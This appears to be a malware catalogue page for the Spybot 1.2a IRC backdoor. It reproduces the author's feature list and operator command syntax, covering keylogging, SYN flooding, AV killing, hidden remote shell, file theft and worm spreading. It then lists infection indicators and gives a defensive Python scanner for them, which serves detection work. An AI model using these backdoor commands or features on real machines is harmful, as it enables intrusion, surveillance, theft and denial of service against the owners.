Spybot 1.2a
(Backdoor.Win32.Spyboter.g)

by Mich

Written in C, source included

Released in April 2003



Spybot1.2a by Mich	
Opensource irc bot
		 
Date: 08:04:2003

Fixed the kuang spreader 


Date: 05:04:2003

Features: 

- HTTP server
The bot now has a built-in HTTP server with options to set the root dir and port.
Example: if you set the port to 81 and the root dir to c:\ and you go to the URL http://victums.ip.address.com:81/ then it will list all files
and dirs in the c:\ dir (same as a file manager)

- Threads list
Lists all running threads, with an option to kill a thread

- Port scanner

- Syn flooder

- Kuang2 and sub7 spreader 

- KaZaa spreader

- Remote cmd.exe
Runs cmd.exe hidden on the remote PC; this allows you to run commands like netstat, ftp, telnet, etc. (doesn't work on Win9x as far as I know)

- Keylogger
Online and offline keylogger

- PortRedirect

- List processes  
Shows all running processes.
You can kill a process.

- AV/Firewall killer

- DCC Send
You can send a file to the bot with the normal DCC send option in mIRC (only tested it with mIRC 6.03; get it from www.mirc.com)

- Get File
Download a file from the bot's PC (the bot will start a DCC send)

- DCC Chat
Just the normal DCC chat option in mIRC. All commands also work here; use this if you want to give a command that has a lot of output, since most IRC servers will disconnect the bot if it sends a lot of data.

- List files
Lists all files and dirs matching your search query. Example: list c:\windows\*.exe will list all .exe files in the windows dir

- Hostmask match login
When you use the login [password] command, the bot checks whether your hostmask matches a hostmask in the trusted hosts list (settings.h). If not, you can't log in.

- Raw Commands (on connect and onjoin)
The bot reads a list of raw commands when it connects or joins a channel
Example:
On join:
	MODE $CHAN +nts
	MODE $CHAN +k trojanforge
On Connect
	MODE $NICK +I

- Computer info
Gives some pc info including ip address
 
- Topic commands
Option to give the bot a command via the topic (when the bot joins the channel)

- Lists the passwords (only win 9x)
- Execute, delete, rename file and make dir
- Sendkeys 
- Open/close cd-rom
- Reboot pc
- Disconnect for x sec.
- Reconnect
- Quit 
- Raw commands


Commands list

Login password
raw [raw command]							(example: raw PRIVMSG #spybot1.1 :hello)
list [path+filter]	  						(example: list c:\*.*)
delete [filename]							(example: delete c:\windows\netstat.exe)
execute [filename]
rename [origenamfile] [newfile]						(example: rename c:\windows\netstat.exe c:\windows\netstatbackup.bak)
makedir [dirname]							(example: makedir c:\test\  )
startkeylogger 								(info: starts the online keylogger and outputs to the channel\query\dcc chat)
stopkeylogger
sendkeys [keys]								(info: simulates keypresses; to simulate return, hit ctrl+b (bold in mIRC), and for backspace, ctrl+u (underlined in mIRC))
keyboardlights								(info: flashes his keyboard lights 50x)
info									(info: gives some info)
passwords								(info: lists the ras passwords in win 9x)
listprocesses								(info: lists all running processes)
killprocess [processname] 						(example: killprocess taskmgr.exe; NOTE: if listprocesses shows the entire path, you must use it with killprocess too)
reconnect
disconnect [sec.]							(info: disconnects the bot for x sec.; if sec. is not given it disconnects the bot for 30 mins.)
quit									(info: bot quits running)
reboot
cd-rom [0/1]								(info: opens/closes the cd-rom. cd-rom 1 = open, cd-rom 0 = close)
httpserver [port] [root-dir]         					(example: httpserver 81 c:\)
syn [host] [port] [delay msec.] [times]					(example: syn 127.0.0.1 80 100 1000)
redirect [input port] [host] [output port]				(example: redirect 100 eu.undernet.org 6667)
threads									(info: will list all threads)
killthread [number]							(info: kills the selected thread)
get [filename]								(example: get c:\windows\system\keylogs.txt will trigger a dcc send on the remote pc)
opencmd									(info: starts cmd.exe on the  remote pc hidden)
cmd [command]								(info: sends a command to cmd.exe example: cmd netstat -an)
scan [start ip address] [port] [delay] [filename]			(example: scan 127.0.0.1 17300 1 portscan.txt)
filename is optional; when used, the result will be logged to that file. If ip is 0, a random ip is generated.

DCC

DCC chat, DCC send and DCC get work with any normal IRC client. In mIRC the commands are: /dcc chat [nickname] and /dcc send [nickname]

Mich


Server:
dropped files:
c:\WINDOWS\SYSTEM\avg32.exe   Size: 20.512 bytes 
c:\WINDOWS\SYSTEM\KEYLOG.TXT 

startup:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce "Winsockport" 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "Winsockport" 
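
The indicators listed above can be checked against the text of a registry export and a file listing. This is an added example, not part of the original page or the bot's source; the function names, the sample export and its value data are constructed for illustration.

```python
import re

# Indicators copied from the page's "Server" section (compared case-insensitively).
RUN_VALUE = "winsockport"
RUN_KEYS = {
    r"hkey_current_user\software\microsoft\windows\currentversion\runonce",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
}
DROPPED = {r"c:\windows\system\avg32.exe", r"c:\windows\system\keylog.txt"}

def scan_reg_export(text):
    """Return (key, value name, data) for each listed autostart value in .reg text."""
    hits, key = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]          # remember which key the following values belong to
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if m and key and key.lower() in RUN_KEYS and m.group(1).lower() == RUN_VALUE:
            hits.append((key, m.group(1), m.group(2)))
    return hits

def scan_paths(paths):
    """Return the paths that match a listed dropped-file location, ignoring case."""
    return [p for p in paths if p.replace("/", "\\").lower() in DROPPED]

# Constructed sample export; the value data is an assumption, the page does not give it.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"Winsockport"="avg32.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Winsockport"="avg32.exe"

[HKEY_CURRENT_USER\Software\Example]
"Winsockport"="unrelated"
'''

if __name__ == "__main__":
    for key, name, data in scan_reg_export(SAMPLE_REG):
        print(f"autostart indicator: {key} {name}={data}")
    for path in scan_paths([r"C:\WINDOWS\SYSTEM\AVG32.EXE", r"c:\windows\notepad.exe"]):
        print(f"dropped-file indicator: {path}")
```

`reg export` writes UTF-16 text, so decode the file before passing its contents to `scan_reg_export`.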

MegaSecurity